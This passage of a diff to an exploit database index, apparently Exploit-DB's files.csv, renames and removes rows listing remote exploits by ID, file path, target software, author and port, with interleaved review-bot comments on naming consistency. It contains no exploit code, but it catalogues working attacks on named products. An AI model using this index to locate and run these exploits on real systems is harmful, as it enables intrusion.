Overflow",2007-07-08,Xpl017Elz,linux,remote,80 4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript HeapSpray",2007-07-10,callAX,windows,remote,0 4176,platforms/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write",2007-07-12,callAX,windows,remote,0 4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog HeapSpray",2007-07-12,callAX,windows,remote,0 
@@ -10113,7 +10126,7 @@ id,file,description,date,author,platform,type,port 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0 -4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Remote",2007-08-28,shinnai,windows,remote,0 +4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Command Execution",2007-08-28,shinnai,windows,remote,0 4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'SaveXMLFile()' Insecure Method",2007-08-27,shinnai,windows,remote,0 4324,platforms/windows/remote/4324.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'DeleteXMLFile()' Insecure Method",2007-08-27,shinnai,windows,remote,0 4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Buffer Overflow",2007-08-28,rgod,windows,remote,0 
@@ -10128,7 +10141,7 @@ id,file,description,date,author,platform,type,port 4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow",2007-09-07,void,windows,remote,0 4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0 SaveToFile()' Insecure Method",2007-09-10,shinnai,windows,remote,0 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow",2007-09-10,shinnai,windows,remote,0 -4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote",2007-09-10,"Mattias Bengtsson",multiple,remote,0 +4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution",2007-09-10,"Mattias Bengtsson",multiple,remote,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - 'PDWizard.ocx' Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - 'VBTOVSI.dll 1.0.0.0' File Overwrite",2007-09-11,shinnai,windows,remote,0 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server - Distributed Management Objects Buffer Overflow",2007-09-12,96sysim,windows,remote,0 
@@ -10138,7 +10151,7 @@ id,file,description,date,author,platform,type,port 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution",2007-09-19,h07,windows,remote,0 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - 'SEARCH' Authenticated Overflow",2007-09-19,void,windows,remote,143 -4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Remote",2007-09-20,Andi,linux,remote,80 +4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution",2007-09-20,Andi,linux,remote,80 4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow",2007-09-21,axis,windows,remote,25 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - 'emprint.dll 6.0.1.0' Buffer Overflow",2007-09-23,rgod,windows,remote,0 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - 'If-Modified-Since' Remote Buffer Overflow",2007-09-24,h07,windows,remote,80 
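Review bot: 4437 becomes "Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution" while the preceding hunk renames 4391 (Lighttpd 1.4.16, same bug class) to "FastCGI Header Overflow Remote Command Execution"; the two rows now describe the same issue in two different vocabularies, and 4437's wording drops the "Remote" that every other rename in this commit adds. Suggest "FastCGI Header Overflow Remote Code Execution" for both. 4391 also carries port 0 where 4437 has 80; it is the same HTTP service, so 80 for both.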
@@ -10167,7 +10180,7 @@ id,file,description,date,author,platform,type,port 4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow",2007-10-27,muts,windows,remote,1581 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 - IMAP4 Server LSUB Command",2007-10-27,FistFuXXer,windows,remote,143 4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,windows,remote,0 -4594,platforms/windows/remote/4594.html,"SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote",2007-11-01,krafty,windows,remote,0 +4594,platforms/windows/remote/4594.html,"SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution",2007-11-01,krafty,windows,remote,0 4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 - Insecure Method",2007-11-02,shinnai,windows,remote,0 4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista/XP) - RSTP Response Code Execution",2007-11-24,InTeL,windows,remote,0 
@@ -10197,7 +10210,7 @@ id,file,description,date,author,platform,type,port 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow",2007-12-31,Elazar,windows,remote,0 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",linux,remote,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,windows,remote,0 -4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Overflow (SEH)",2008-01-08,Elazar,windows,remote,0 +4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Remote Overflow (SEH)",2008-01-08,Elazar,windows,remote,0 4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method",2008-01-08,Elazar,windows,remote,0 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,windows,remote,0 
@@ -10315,7 +10328,6 @@ id,file,description,date,author,platform,type,port 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0 6012,platforms/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 -6026,platforms/linux/remote/6026.pl,"Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation",2008-07-17,eliteboy,linux,remote,0 
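Review bot: the row for 6026 (Fonality trixbox 'langChoice' Local File Inclusion (connect-back) (2), platforms/linux/remote/6026.pl) is removed without a replacement in this hunk. If the entry was reclassified, its new row and the matching file move need to appear elsewhere in this commit; if it was dropped as a duplicate of 6045, that should be stated, since 6045 is a different implementation (Python, 2.6.1) rather than a copy. Either way the reason is not visible from the diff.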
@@ -10325,7 +10337,7 @@ id,file,description,date,author,platform,type,port 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0 -6124,platforms/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote",2008-07-24,callAX,windows,remote,0 +6124,platforms/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download",2008-07-24,callAX,windows,remote,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-25,"Marc Bevand",multiple,remote,0 6151,platforms/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0 
@@ -10347,7 +10359,7 @@ id,file,description,date,author,platform,type,port 6318,platforms/windows/remote/6318.html,"Ultra Shareware Office Control - ActiveX Control Remote Buffer Overflow",2008-08-27,shinnai,windows,remote,0 6323,platforms/windows/remote/6323.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Remote Buffer Overflow",2008-08-28,spdr,windows,remote,0 6324,platforms/windows/remote/6324.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Command Execution",2008-08-28,spdr,windows,remote,0 -6328,platforms/solaris/remote/6328.c,"Sun Solaris 10 - snoop(1M) Utility Remote",2008-08-29,Andi,solaris,remote,0 +6328,platforms/solaris/remote/6328.c,"Sun Solaris 10 - snoop(1M) Utility Remote Command Execution",2008-08-29,Andi,solaris,remote,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies - Read/Write Registry/Read Files",2008-08-30,spdr,windows,remote,0 6355,platforms/windows/remote/6355.txt,"Google Chrome 0.2.149.27 - Automatic File Download",2008-09-03,nerex,windows,remote,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)",2008-09-05,ShadOS,hardware,remote,0 
@@ -10358,14 +10370,14 @@ id,file,description,date,author,platform,type,port 6454,platforms/windows/remote/6454.html,"Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,windows,remote,0 6476,platforms/hardware/remote/6476.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 -6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll'",2008-09-19,Nine:Situations:Group,windows,remote,0 +6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Command Execution",2008-09-19,Nine:Situations:Group,windows,remote,0 6506,platforms/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Directory Traversal",2008-09-21,"Luigi Auriemma",windows,remote,0 6532,platforms/hardware/remote/6532.py,"Sagem F@ST Routers - DHCP Hostname Cross-Site Request Forgery",2008-09-22,Zigma,hardware,remote,0 6537,platforms/windows/remote/6537.html,"Chilkat XML - ActiveX Arbitrary File Creation/Execution",2008-09-23,shinnai,windows,remote,0 6548,platforms/windows/remote/6548.html,"BurnAware - NMSDVDXU ActiveX Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0 6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)",2008-09-25,"Kevin Finisterre",windows,remote,0 6600,platforms/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 - File Execution / IE Denial of Service",2008-09-27,e.wiZz!,windows,remote,0 -6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module - Remote",2008-09-30,Nine:Situations:Group,windows,remote,0 +6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / 
LiveUpdate Module - Remote Code Execution",2008-09-30,Nine:Situations:Group,windows,remote,0 6638,platforms/windows/remote/6638.html,"GdPicture Pro - ActiveX 'gdpicture4s.ocx' File Overwrite / Exec",2008-09-30,EgiX,windows,remote,0 6656,platforms/windows/remote/6656.txt,"Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 6661,platforms/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 @@ -10527,7 +10539,7 @@ id,file,description,date,author,platform,type,port 8525,platforms/windows/remote/8525.pl,"BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0 8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - Directory Traversal / File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus - HTTP Server Remote Buffer Overflow",2009-04-27,His0k4,windows,remote,80 -8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote",2009-04-28,sgrakkyu,linux,remote,0 +8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow",2009-04-28,sgrakkyu,linux,remote,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution",2009-04-28,Elazar,windows,remote,0 8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure",2009-04-28,Cyber-Zone,windows,remote,0 8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow",2009-04-29,Nine:Situations:Group,windows,remote,0 
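Review bot: 8556's new description "SCTP FWD Memory Corruption Remote Overflow" stacks two defect labels; "Memory Corruption" already names the bug class, and "Remote Overflow" appended after it reads as a second, competing one. Suggest "SCTP FWD Remote Memory Corruption", or "SCTP FWD Memory Corruption Remote Code Execution" if the code yields execution, following the pattern used for 6630 in this same hunk, where the outcome ("Remote Code Execution") rather than a defect type is added.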
@@ -10587,7 +10599,7 @@ id,file,description,date,author,platform,type,port 9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)",2009-07-20,netsoul,windows,remote,0 -9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11'",2009-07-21,"Ahmed Obied",windows,remote,0 +9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Remote Overflow",2009-07-21,"Ahmed Obied",windows,remote,0 9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - Font Tags Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0 9303,platforms/windows/remote/9303.c,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow",2009-07-30,"Pankaj Kohli",windows,remote,0 
@@ -10631,13 +10643,11 @@ id,file,description,date,author,platform,type,port 9718,platforms/multiple/remote/9718.txt,"Xerver HTTP Server 4.32 - Cross-Site Scripting / Directory Traversal",2009-09-18,Stack,multiple,remote,0 9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80 9802,platforms/windows/remote/9802.html,"IBM Installation Manager 1.3.0 - 'iim://' URI handler",2009-09-29,bruiser,windows,remote,0 -9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote",2009-09-29,pyrokinesis,windows,remote,0 +9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow",2009-09-29,pyrokinesis,windows,remote,0 9805,platforms/windows/remote/9805.html,"Oracle - Document Capture BlackIce DEVMODE",2009-09-29,pyrokinesis,windows,remote,0 9810,platforms/windows/remote/9810.txt,"EnjoySAP 6.4/7.1 - File Overwrite",2009-09-28,sh2kerr,windows,remote,0 9813,platforms/windows/remote/9813.txt,"Mereo Web Server 1.8 - Source Code Disclosure",2009-09-25,Dr_IDE,windows,remote,80 -9815,platforms/windows/remote/9815.py,"Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote,0 9816,platforms/windows/remote/9816.py,"VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote,0 -9817,platforms/windows/remote/9817.py,"CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote,0 9829,platforms/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 9843,platforms/multiple/remote/9843.txt,"Blender 2.34/2.35a/2.4/2.49b - '.blend' Command Injection",2009-11-05,"Core Security",multiple,remote,0 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 
1.0 121 - '.m3u' Buffer Overflow (1)",2009-11-03,corelanc0d3r,windows,remote,0 @@ -10668,7 +10678,7 @@ id,file,description,date,author,platform,type,port 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690 -9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 +9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0 9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0 9940,platforms/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123 
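Review bot: 9803 keeps the misspelling "ApllicationXtender" in both the removed and the added row; the description is being rewritten anyway, so correct it to "ApplicationXtender" in the same change rather than carrying the typo forward. The removals of 9815 and 9817 are consistent with their titles, which both say "Local Buffer Overflow (PoC)" while the rows sit under platforms/windows/remote; that is fine provided the corresponding local rows and file moves appear elsewhere in this commit, otherwise the two entries vanish from the index.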
@@ -10710,7 +10720,7 @@ id,file,description,date,author,platform,type,port 10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - 'apply.cgi' Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",cgi,remote,80 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80 -10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Overflow (Metasploit)",2004-07-18,onetwo,linux,remote,7787 +10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit)",2004-07-18,onetwo,linux,remote,7787 10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit)",2001-09-01,"H D Moore",irix,remote,515 10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20/11.00/11.11 - Command Execution (Metasploit)",2002-08-28,"H D Moore",hp-ux,remote,515 10035,platforms/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - 'report()' Buffer Overflow (Metasploit)",2008-01-08,MC,bsd,remote,49 
@@ -10753,9 +10763,9 @@ id,file,description,date,author,platform,type,port 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 -10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Overflow (SEH)",2009-12-29,Lincoln,windows,remote,6660 +10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Remote Overflow (SEH)",2009-12-29,Lincoln,windows,remote,6660 10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities",2009-12-30,emgent,windows,remote,80 -10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Overflow (SEH)",2010-01-02,Lincoln,windows,remote,0 +10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Remote Overflow (SEH)",2010-01-02,Lincoln,windows,remote,0 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote,0 10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,linux,remote,0 11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",novell,remote,0 
@@ -10775,7 +10785,7 @@ id,file,description,date,author,platform,type,port 11272,platforms/windows/remote/11272.py,"CamShot 1.2 - Overwrite (SEH)",2010-01-27,tecnik,windows,remote,0 11293,platforms/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote Buffer Overflow",2010-01-30,Dz_attacker,windows,remote,0 11328,platforms/windows/remote/11328.py,"UplusFTP Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 -11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote",2010-02-12,Lincoln,windows,remote,0 +11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Overflow",2010-02-12,Lincoln,windows,remote,0 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,windows,remote,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",windows,remote,0 11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add)",2010-02-15,"Sioma Labs",windows,remote,0 
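Review bot: 11420 names the product "(Gabriel's FTP Server) Open & Compact FTPd 1.2", while 13932 in a later hunk calls the same product "(Gabriel's FTP Server) Open & Compact FTP Server 1.2"; since this patch is already editing the 11420 title, normalise the product name at the same time so the two rows sort and search together.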
@@ -10831,7 +10841,7 @@ id,file,description,date,author,platform,type,port 12312,platforms/windows/remote/12312.rb,"EasyFTP Server 1.7.0.2 - CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",windows,remote,0 12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0 12331,platforms/windows/remote/12331.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (2)",2010-04-20,Dr_IDE,windows,remote,0 -12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 - 'PWD' Remote",2010-04-22,zombiefx,windows,remote,0 +12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 - 'PWD' Remote Overflow",2010-04-22,zombiefx,windows,remote,0 12343,platforms/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote,0 12367,platforms/windows/remote/12367.html,"HP Digital Imaging - 'hpodio08.dll' Insecure Method",2010-04-24,"ThE g0bL!N",windows,remote,0 12380,platforms/windows/remote/12380.pl,"Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0 
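Review bot: 12332 gains "'PWD' Remote Overflow", but the other FTP-client exploit in this hunk, 12380 "Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)", uses "Buffer Overflow" and leaves the command unquoted; the two rows should follow one pattern, e.g. "'PWD' Remote Buffer Overflow" and "'PASV' Buffer Overflow (SEH)".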
@@ -10864,7 +10874,7 @@ id,file,description,date,author,platform,type,port 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte",2010-06-13,kingcope,multiple,remote,80 13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute",2010-06-13,anonymous,linux,remote,0 -13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Overflow (SEH)",2010-06-17,b0nd,windows,remote,0 +13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Remote Overflow (SEH)",2010-06-17,b0nd,windows,remote,0 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 
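Review bot: 13903 "File Sharing Wizard 1.5.0 - Remote Overflow (SEH)" adds another spelling of the SEH-overwrite case to the file, which elsewhere uses "Overwrite (SEH)" (11272 "CamShot 1.2 - Overwrite (SEH)", 14195 "ActiveX Overwrite (SEH)") and "Remote Overflow (SEH)" (10765, 10911); settle on one form before more rows are renamed.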
@@ -10874,17 +10884,17 @@ id,file,description,date,author,platform,type,port 14180,platforms/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14181,platforms/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14182,platforms/windows/remote/14182.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote",2010-07-03,dmc,windows,remote,0 +14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Overflow",2010-07-03,dmc,windows,remote,0 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)",2010-07-03,blake,windows,remote,0 14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 